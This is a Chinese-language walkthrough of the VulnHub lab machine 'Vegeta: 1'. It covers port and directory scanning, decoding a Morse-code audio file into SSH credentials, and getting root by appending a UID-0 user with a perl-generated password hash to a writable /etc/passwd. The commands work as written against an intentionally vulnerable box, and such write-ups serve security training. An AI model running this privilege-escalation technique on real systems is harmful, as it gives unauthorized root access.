渗透思路:

nmap扫描----gobuster扫描网站目录----在线解码摩斯电码,得到ssh用户名密码----/etc/passwd写入用户提权

环境信息:

靶机:192.168.101.77

攻击机:192.168.101.34

具体步骤:

1、nmap扫描

sudo nmap -sV -sC -p- 192.168.101.77

2、dirb扫描网站目录(兔子洞)

​dirb http://192.168.101.77

发现http://192.168.101.77/robots.txt

(下面是一个兔子洞)

浏览器访问http://192.168.101.77/robots.txt,发现/find_me

浏览器访问/find_me,点击find_me.html,并查看网页源代码

view-source:http://192.168.101.77/find_me/find_me.html

拉到最下面发现一大段注释(没啥用就不复制粘贴了)

base64解码之后还是一堆没有意义的乱码,此路不通

3、gobuster扫描网站目录

​gobuster dir -u http://192.168.101.77/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

扫描到/bulma

http://192.168.101.77/bulma/是个目录,里面有个文件hahahaha.wav

下载下来听了一下,感觉是摩斯电码

4、在线解码摩斯电码,得到ssh用户名密码

找了个在线翻译器:Morse Code Audio Decoder | Morse Code World

按upload上传hahahaha.wav,然后按play,自动转为文本信息

得到的结果是

USES: TRUNKS PASSWORD : US3R(S IN DOLLPS SYMBOL)

以用户名trunks,密码u$3r进行ssh登录

ssh trunks@192.168.101.77

5、/etc/passwd写入新用户提权

查看/home/trunks/.bash_history,发现其中有向/etc/passwd写入新用户的操作

查看/etc/passwd的文件权限

ls -al /etc/passwd

发现trunks用户有写权限

参考/home/trunks/.bash_history中的命令,先用perl生成加密的用户密码

perl -le 'print crypt("123456","addedsalt")'

以上命令中,用户的明文密码为123456

然后再将新用户test写入/etc/passwd

echo "test:adrla7IBSfTZQ:0:0:root:/root:/bin/bash" >> /etc/passwd

最后切换到test用户,输入密码123456,获得root权限,并在/root目录下找到root.txt

su - test

vulnhub Vegeta: 1相关推荐

  1. vulnhub之vegeta

    目录 一.主机发现 二.端口扫描 四.信息收集 五.cyberchef解密 1.两道base64解密. 2.save保存 3.qrcode module 4.二维码提取工具zbaring 六.大字典跑 ...

  2. 靶机13 VEGETA: 1

    简介:这是一个完整的初学者的机器,获取标志 1.下载靶场 靶机名称:VEGETA: 1 下载地址: Vegeta: 1 ~ VulnHub 2.安装靶场 导入成功,开启此虚拟机( 当页面出现 Vege ...

  3. Vulnhub靶机:VEGETA_ 1

    目录 介绍 信息收集 主机发现 主机信息探测 网站探测 目录扫描 cyberchef解密 分析二维码 二次目录爆破 分析摩斯电码-音频 提权 介绍 系列:Vegeta(此系列共1台) 发布日期:202 ...

  4. Vegeta靶机总结

    Vegeta靶机渗透总结 靶机下载地址: https://download.vulnhub.com/vegeta/Vegeta.ova 修改vegeta靶机的网络连接模式为NAT,然后发现使用nmap ...

  5. 渗透测试靶机搭建_对vulnhub中Android4靶机渗透测试全过程!

    Android4靶机简介 名称:Android4 操作系统:Android v4.4 标志:/data/root/(在此目录中) 等级:初学者. 下载链接:Android4:https://downl ...

  6. Vulnhub靶机渗透之 RAVEN: 1

    目录 Description 网卡信息 信息收集 主机发现 主机存活扫描 端口扫描 网站信息 网站首页 nikto 报告 service 页面 wordpress 渗透过程 SSH 爆破 Hydr 命 ...

  7. [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)

    这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...

  8. 【Vulnhub靶机系列】DC2

    基本信息 Kali:192.168.61.145 DC2:192.168.61.162 实验过程 在Kali中先进行内网探活 sudo arp-scan --interface eth0 192.16 ...

  9. 【Vulnhub靶机系列】DC1

    基本信息 Kali: 192.168.56.116 DC1: 192.168.56.115 实验过程 先在Kali中使用arp-scan进行主机探活 sudo arp-scan --interface ...

最新文章

  1. kendoui仪表盘和柱状图 示例
  2. Spring 注解配置
  3. 判断字符串1是否在字符串2中出现的方法
  4. ili9341代码移植注意事项
  5. ModelSim 使用笔记1
  6. DNA甲基化检测服务
  7. 9.3磁盘及文件系统管理详解
  8. vant 引进单个样式_vue 公共列表选择组件,引用Vant-UI的样式方式
  9. LeetCode(509)——斐波那契数(JavaScript)
  10. RedHat配置yum源
  11. 亚马逊:贝佐斯没有闹钟
  12. 小甲鱼 c语言 20课 二维数组
  13. 设计算法判断单链表的全部 n 个字符是否中心对称
  14. AU降噪 李兴兴
  15. JRebel启动报错:compile error: cannot find constructor org.zeroturnaround.javarebel.integration.spring
  16. 美丽的诗句 撩妹首选哦!
  17. 利用传感器实现微信的摇一摇功能
  18. 简单静态web页面+动画(小案例)
  19. 计算机网络习题:应用层
  20. 据为己有!这位985博导把审稿的文章拒了,自己投!

热门文章

  1. 谈下mysql中间件(问题域、业内组件)
  2. 前端系列——vue2+高德地图web端开发(行政区边界绘制)
  3. 小小项目2:多项式四目计算器
  4. 使用python实现unix2dos和dos2unix命令
  5. 聚合固码,聚合支付接口,三方支付接口
  6. php中post换了么,php中post换行的代码介绍
  7. 如何用Python下载在线字典上的单词或者短语mp3
  8. 电子计算机发明于1946年对不对,2011国家公务员考试常识900题(最新)
  9. 中国大学生文科计算机大,人民大学学生参加2008(首届)中国大学生(文科)计算机设计大赛取得好成绩...
  10. xendesktop更新计算机,XenDesktop7.12发布Win10周年更新版桌面